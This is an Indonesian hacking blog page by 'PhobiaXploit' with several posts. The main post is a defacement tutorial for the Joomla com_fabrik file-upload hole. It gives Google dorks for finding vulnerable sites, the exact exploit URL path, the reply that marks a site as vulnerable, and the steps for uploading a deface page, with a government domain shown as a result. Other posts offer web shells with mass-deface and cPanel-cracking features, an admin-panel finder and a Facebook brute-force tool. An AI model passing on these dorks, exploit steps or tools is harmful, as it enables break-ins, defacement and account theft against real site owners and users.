Newest Post

Deface Metode Com_Fabrik CSRF

| Jumat, 07 September 2018
Baca selengkapnya »
   Lama Ga update cuy..
soory karena keterbatasan kuota hohoho :v

oke kali ini gua bakalan share cara deface metode Com_Fabrik CSRF
simak tutorialnya ea

Siapin dlu Dorknya
-Dork : inurl:index.php?option=com_fabrik
             inurl:index.php/component/fabrik/ site:.dk
             inurl:index.php?option=com_fabrik&view= site:
             inurl:importcsv.php site:
             inurl:viewTable?cid= site:com
kenbangin pake otak mesum lu ea..jngan cma khayalan yang dikembangin 😀 Kidding

 Exploitnya : /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

Truss htaccess nya DirumahGue
Csrf nya DirumahLu

Oke langsung aja simak baik2..
Pertama dorking dlu di google
 

Truss masukin tuh exploitnya d blakang link,,
contoh:  site.co.li/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

nah klo udah ditambahin nanti akan muncul kaya gini




nah kalo tulisanya kaya gini {"filepath":null,"uri":null} brarti tuh website vuln ea ..
langsung jadiin mangsa :v
setelah itu masukin tuh site.co.li nya ke CSRF
Itu yang Site.co,li nya diganti nama site target luh ea
nah setelah jadi langsung deh luh masukin scrip deface luh sama htaccess nya
jangan lupa ganti htaccess nya jadi nama sc lu ea kaya gini
nah setelah itu upload sc deface kalian dah akan kaya gini hasilnya
muncul tulisan {"filepath":"\/ilusi.html","uri":"http:\/\/www.pn-parepare.go.id.org\/ilusi.html"}
brarti sukses uploadnya
oke dan buka site kalian dan taraa terdeface ,,hohohoho :v

semoga berhasil ya jika ada pertanyaan silakan tulis di komentar
trima kasih bye...


Deface Metode Com_Fabrik CSRF

Posted by : PhobiaXploit
Date :Jumat, 07 September 2018
With 0komentar
Tag :

OtakuShell v1 Buat Defacer Wibu :v

| Senin, 20 Agustus 2018
Baca selengkapnya »
     Hi guys Ni Gua update shell lagi...
kemaren kan team gua buat shell mini kali ini update shell yang lebih komplit..
Namanya OtakuShell ..
Untuk kalian defacer wibu coba pake aja shell ini :v
Oke langsung aja liat fitur2nya dulu barangkali minat langsung sikat aja :v


- Command Linux

- Mass Deface

- Mass Delete

- Config

- Jumping

- Symlink

- CPanel Crack

- SMTP Grabber

- Zone-H

- CGI Telnet

- Network

- Adminer

- Fake Root

- Auto Edit User

- Auto Edit Title WordPress

- WordPress Auto Deface

- WordPress Auto Deface V.2

- CPanel/FTP Auto Deface

- K-RDP Shell

- Script Endcode

- Injection C0de

- Bypass Cloud Flare

- Hash Generate

- Hash ID

- Tools SQL INJECTION

- Zip Menu

- Shell Finder

- Port Scanner

-Bonus Otaku Mode :v :v :v






Background nya Kawaii lagi :D

Sikat langsung DiJepang

Default pass>>otaku

OtakuShell v1 Buat Defacer Wibu :v

Posted by : PhobiaXploit
Date :Senin, 20 Agustus 2018
With 0komentar
Tag : ,

Shell Mini PhobiaXploit

| Sabtu, 18 Agustus 2018
Baca selengkapnya »

Oke gua kali ini akan share Shell Mini buatan PhobiaXploit
shell ini mungkin  cocok buat tebas index doang karena fiturnya yang kurang lengkap.

Fitur Mini Shell :

-Upload
-Chmod
-Edit
-Delete
-Rename

Walaupun fiturnya sedikit tapi matav buat nebas index..

Ga usah banyak cengcong langsung aja comot di Jepang  :v

Shell Mini PhobiaXploit

Posted by : PhobiaXploit
Date :Sabtu, 18 Agustus 2018
With 0komentar
Tag : ,

Neko-Chan {Admin Page}

|
Baca selengkapnya »
 

    kali ini gua bakal share Tools team gua yang baru yaitu Neko-Chan
apa sh fungsinya?
fungsinya buat nyari admin page/halaman login admin..
Knapa namanya Neko-Chan sh,wibu amat?
Serah gua lah orang gua ini yang bikin :v
#GuaWibudanGuaBangga

Oke tanpa berbasibasi langsung aja comot Tools nya dibawah sering2 berkunjung ea ke blog gua biar terus update..

Doain aja biar gua terus realise Tools lainya..

Comot nih Disini

Neko-Chan {Admin Page}

Posted by : PhobiaXploit
Date :
With 0komentar
Tag : ,

Hack Facebook Dengan PhobiaForce

|
Baca selengkapnya »

      Kali ini saya akan menjelaskan bagaimana cara hack facebook dengan tools PhobiaForce
Penjelasan sedikit tentang tools ini..
Tools ini dibuat oleh saya ./Tsuki admin yang paling tamvan eaaa :v
Tools ini sangat simple dalam penggunaanya dan tampilanya
dan jga cara penggunaanya gampang ko cuma masukin id/email nya sma wordlist..biar jelas liat aja di screnshoot nya :D


Sudah saya uji coba di linux tapi maaf bagi pengguna termux tools ini blum fix (blum bisa di jalanin) di termux.
Klo bagi pengguna windows blum saya uji coba smoga aja work ya :)

langsung aja comot dibawah sini..

Disini Cuk

Hack Facebook Dengan PhobiaForce

Posted by : PhobiaXploit
Date :
With 0komentar
Tag : ,

CSRF Com_Fabrik PhobiaXploit

|
Baca selengkapnya »



    Nah kali ini saya admin yang paling keren eeeehh:v
Akan memberikan csrf com_fabrik buatan gua ea..eh maksudnya team gua :D

Liat dlu gambarnya seger kan dipandang :)

Pasti udah pada tau fungsinya kan klo belum tau gua jelasin...

CSRF (Cross-site Request Forgery) CSRF (Cross-site Request Forgery) merupakan suatu teknik hacking untuk mendapatkan atau bahkan menguasai suatu account dengan cara menyerang web yang dieksekusi atas wewenang korban, tanpa dikehendakinya.

Ya kurang lebih kaya gitu lah..
Oke langsung sedot aja di bawah..

Langsung aja >> Sikat <<

CSRF Com_Fabrik PhobiaXploit

Posted by : PhobiaXploit
Date :
With 0komentar
Tag : ,

CARA MENCARI HALAMAN LOGIN ADMIN DENGAN ADMIN PANEL FINDER

| Rabu, 27 Juni 2018
Baca selengkapnya »
Kali ini saya akan menjelaskan bagaimana cara mencari halaman login admin /admin page dengan ADMIN PANEL FINDER

Sebelum itu jika belum punya software nya bisa download disini
https://github.com/the-c0d3r/admin-finder

Oke langsung aja kita

Pertama kita maskan dulu perintah nya
  
#cd  admin-panel-finder
Setelah masuk directorinya ketikan perintah
#python admin_panel_finder.py 


Setelah ketemu kita copy link nya
 Dan berhasil menemukan page login adminnya

mungkin cukup sampai sini saja..terima kasih

jika ada yang mau ditanyakan silakan tulis di kolom komentar





CARA MENCARI HALAMAN LOGIN ADMIN DENGAN ADMIN PANEL FINDER

Posted by : PhobiaXploit
Date :Rabu, 27 Juni 2018
With 0komentar
Tag :
Prev
▲Top▲